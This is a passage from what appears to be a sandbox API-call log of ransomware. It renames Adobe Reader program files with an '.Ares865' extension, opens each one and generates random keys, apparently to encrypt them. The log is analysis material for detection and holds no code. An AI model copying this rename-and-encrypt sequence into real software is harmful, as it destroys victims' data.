10.0\\Reader\\A3DUtils.dll.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\a3dutils.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0165.334] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=205720) returned 1 [0165.334] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0165.335] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0165.335] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0165.396] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0165.397] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0165.397] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0165.400] lstrcpyW (in: lpString1=0x2cce460, lpString2="ACE.dll" | out: lpString1="ACE.dll") returned="ACE.dll" [0165.400] lstrlenW (lpString="ACE.dll") returned 7 [0165.400] lstrlenW (lpString="Ares865") returned 7 [0165.400] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\ACE.dll.Ares865") returned 63 [0165.401] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\ACE.dll" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\ace.dll"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\ACE.dll.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\ace.dll.ares865"), dwFlags=0x1) returned 1 [0165.404] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\ACE.dll.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\ace.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0165.404] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=818568) returned 1 [0165.404] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0165.405] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0165.405] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0165.461] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0165.462] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0165.462] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0165.473] lstrcpyW (in: lpString1=0x2cce460, lpString2="AcroBroker.exe" | out: lpString1="AcroBroker.exe") returned="AcroBroker.exe" [0165.473] lstrlenW (lpString="AcroBroker.exe") returned 14 [0165.473] lstrlenW (lpString="Ares865") returned 7 [0165.473] lstrcmpiW (lpString1="ker.exe", lpString2="Ares865") returned 1 [0165.473] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AcroBroker.exe.Ares865") returned 70 [0165.473] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AcroBroker.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\acrobroker.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AcroBroker.exe.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\acrobroker.exe.ares865"), dwFlags=0x1) returned 1 [0165.477] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AcroBroker.exe.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\acrobroker.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0165.477] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=294808) returned 1 [0165.478] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0165.478] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0165.478] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0165.492] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0165.493] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0165.493] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0165.497] lstrcpyW (in: lpString1=0x2cce460, lpString2="Acrofx32.dll" | out: lpString1="Acrofx32.dll") returned="Acrofx32.dll" [0165.497] lstrlenW (lpString="Acrofx32.dll") returned 12 [0165.497] lstrlenW (lpString="Ares865") returned 7 [0165.497] lstrcmpiW (lpString1="x32.dll", lpString2="Ares865") returned 1 [0165.498] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Acrofx32.dll.Ares865") returned 68 [0165.498] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Acrofx32.dll" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\acrofx32.dll"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Acrofx32.dll.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\acrofx32.dll.ares865"), dwFlags=0x1) returned 1 [0165.501] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Acrofx32.dll.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\acrofx32.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0165.501] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=63384) returned 1 [0165.501] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0165.502] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0165.502] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0165.507] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0165.508] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0165.508] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0165.509] lstrcpyW (in: lpString1=0x2cce460, lpString2="AcroRd32.dll" | out: lpString1="AcroRd32.dll") returned="AcroRd32.dll" [0165.509] lstrlenW (lpString="AcroRd32.dll") returned 12 [0165.509] lstrlenW (lpString="Ares865") returned 7 [0165.509] lstrcmpiW (lpString1="d32.dll", lpString2="Ares865") returned 1 [0165.509] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AcroRd32.dll.Ares865") returned 68 [0165.510] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AcroRd32.dll" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\acrord32.dll"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AcroRd32.dll.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\acrord32.dll.ares865"), dwFlags=0x1) returned 1 [0165.522] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AcroRd32.dll.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\acrord32.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0165.522] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=23724952) returned 1 [0165.523] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0165.523] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0165.523] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0165.820] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0165.821] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0165.821] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0165.836] lstrcpyW (in: lpString1=0x2cce460, lpString2="AcroRd32.exe" | out: lpString1="AcroRd32.exe") returned="AcroRd32.exe" [0165.836] lstrlenW (lpString="AcroRd32.exe") returned 12 [0165.836] lstrlenW (lpString="Ares865") returned 7 [0165.836] lstrcmpiW (lpString1="d32.exe", lpString2="Ares865") returned 1 [0165.836] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AcroRd32.exe.Ares865") returned 68 [0165.836] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AcroRd32.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\acrord32.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AcroRd32.exe.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\acrord32.exe.ares865"), dwFlags=0x1) returned 1 [0165.840] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AcroRd32.exe.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\acrord32.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0165.840] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1289624) returned 1 [0165.840] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0165.841] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0165.841] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0165.898] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0165.899] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0165.899] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0165.915] lstrcpyW (in: lpString1=0x2cce460, lpString2="AcroRd32Info.exe" | out: lpString1="AcroRd32Info.exe") returned="AcroRd32Info.exe" [0165.916] lstrlenW (lpString="AcroRd32Info.exe") returned 16 [0165.916] lstrlenW (lpString="Ares865") returned 7 [0165.916] lstrcmpiW (lpString1="nfo.exe", lpString2="Ares865") returned 1 [0165.916] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AcroRd32Info.exe.Ares865") returned 72 [0165.916] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AcroRd32Info.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\acrord32info.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AcroRd32Info.exe.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\acrord32info.exe.ares865"), dwFlags=0x1) returned 1 [0165.920] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AcroRd32Info.exe.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\acrord32info.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0165.920] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=17824) returned 1 [0165.920] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0165.921] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0165.921] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0165.932] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0165.932] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0165.932] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0165.933] lstrcpyW (in: lpString1=0x2cce460, lpString2="AcroTextExtractor.exe" | out: lpString1="AcroTextExtractor.exe") returned="AcroTextExtractor.exe" [0165.933] lstrlenW (lpString="AcroTextExtractor.exe") returned 21 [0165.933] lstrlenW (lpString="Ares865") returned 7 [0165.933] lstrcmpiW (lpString1="tor.exe", lpString2="Ares865") returned 1 [0165.933] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AcroTextExtractor.exe.Ares865") returned 77 [0165.934] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AcroTextExtractor.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\acrotextextractor.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AcroTextExtractor.exe.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\acrotextextractor.exe.ares865"), dwFlags=0x1) returned 1 [0165.936] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AcroTextExtractor.exe.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\acrotextextractor.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0165.936] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=49064) returned 1 [0165.936] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0165.937] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0165.937] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0165.947] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0165.948] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0165.948] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0165.949] lstrcpyW (in: lpString1=0x2cce460, lpString2="Adobe.Reader.Dependencies.manifest" | out: lpString1="Adobe.Reader.Dependencies.manifest") returned="Adobe.Reader.Dependencies.manifest" [0165.949] lstrlenW (lpString="Adobe.Reader.Dependencies.manifest") returned 34 [0165.949] lstrlenW (lpString="Ares865") returned 7 [0165.949] lstrcmpiW (lpString1="anifest", lpString2="Ares865") returned -1 [0165.950] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Adobe.Reader.Dependencies.manifest.Ares865") returned 90 [0165.950] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Adobe.Reader.Dependencies.manifest" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\adobe.reader.dependencies.manifest"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Adobe.Reader.Dependencies.manifest.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\adobe.reader.dependencies.manifest.ares865"), dwFlags=0x1) returned 1 [0165.952] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Adobe.Reader.Dependencies.manifest.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\adobe.reader.dependencies.manifest.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0165.952] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1472) returned 1 [0165.952] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0165.953] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0165.953] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0165.955] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0165.956] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0165.956] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0165.956] lstrcpyW (in: lpString1=0x2cce460, lpString2="AdobeCollabSync.exe" | out: lpString1="AdobeCollabSync.exe") returned="AdobeCollabSync.exe" [0165.956] lstrlenW (lpString="AdobeCollabSync.exe") returned 19 [0165.956] lstrlenW (lpString="Ares865") returned 7 [0165.956] lstrcmpiW (lpString1="ync.exe", lpString2="Ares865") returned 1 [0165.956] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AdobeCollabSync.exe.Ares865") returned 75 [0165.956] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AdobeCollabSync.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\adobecollabsync.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AdobeCollabSync.exe.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\adobecollabsync.exe.ares865"), dwFlags=0x1) returned 1 [0165.959] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AdobeCollabSync.exe.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\adobecollabsync.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0165.959] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1216416) returned 1 [0165.960] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0165.960] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0165.960] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0166.037] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0166.038] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0166.038] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0166.054] lstrcpyW (in: lpString1=0x2cce460, lpString2="AdobeLinguistic.dll" | out: lpString1="AdobeLinguistic.dll") returned="AdobeLinguistic.dll" [0166.054] lstrlenW (lpString="AdobeLinguistic.dll") returned 19 [0166.054] lstrlenW (lpString="Ares865") returned 7 [0166.054] lstrcmpiW (lpString1="tic.dll", lpString2="Ares865") returned 1 [0166.054] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AdobeLinguistic.dll.Ares865") returned 75 [0166.054] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AdobeLinguistic.dll" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\adobelinguistic.dll"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AdobeLinguistic.dll.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\adobelinguistic.dll.ares865"), dwFlags=0x1) returned 1 [0166.058] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AdobeLinguistic.dll.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\adobelinguistic.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0166.058] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=757664) returned 1 [0166.058] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0166.059] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0166.059] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0166.092] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0166.093] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0166.093] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0166.103] lstrcpyW (in: lpString1=0x2cce460, lpString2="adoberfp.dll" | out: lpString1="adoberfp.dll") returned="adoberfp.dll" [0166.103] lstrlenW (lpString="adoberfp.dll") returned 12 [0166.103] lstrlenW (lpString="Ares865") returned 7 [0166.103] lstrcmpiW (lpString1="rfp.dll", lpString2="Ares865") returned 1 [0166.104] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\adoberfp.dll.Ares865") returned 68 [0166.104] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\adoberfp.dll" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\adoberfp.dll"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\adoberfp.dll.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\adoberfp.dll.ares865"), dwFlags=0x1) returned 1 [0166.107] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\adoberfp.dll.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\adoberfp.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0166.107] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=226200) returned 1 [0166.108] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0166.108] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0166.108] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0166.120] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0166.121] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0166.121] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0166.124] lstrcpyW (in: lpString1=0x2cce460, lpString2="AdobeXMP.dll" | out: lpString1="AdobeXMP.dll") returned="AdobeXMP.dll" [0166.124] lstrlenW (lpString="AdobeXMP.dll") returned 12 [0166.124] lstrlenW (lpString="Ares865") returned 7 [0166.124] lstrcmpiW (lpString1="XMP.dll", lpString2="Ares865") returned 1 [0166.124] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AdobeXMP.dll.Ares865") returned 68 [0166.124] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AdobeXMP.dll" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\adobexmp.dll"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AdobeXMP.dll.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\adobexmp.dll.ares865"), dwFlags=0x1) returned 1 [0166.127] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AdobeXMP.dll.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\adobexmp.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0166.127] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=304536) returned 1 [0166.127] 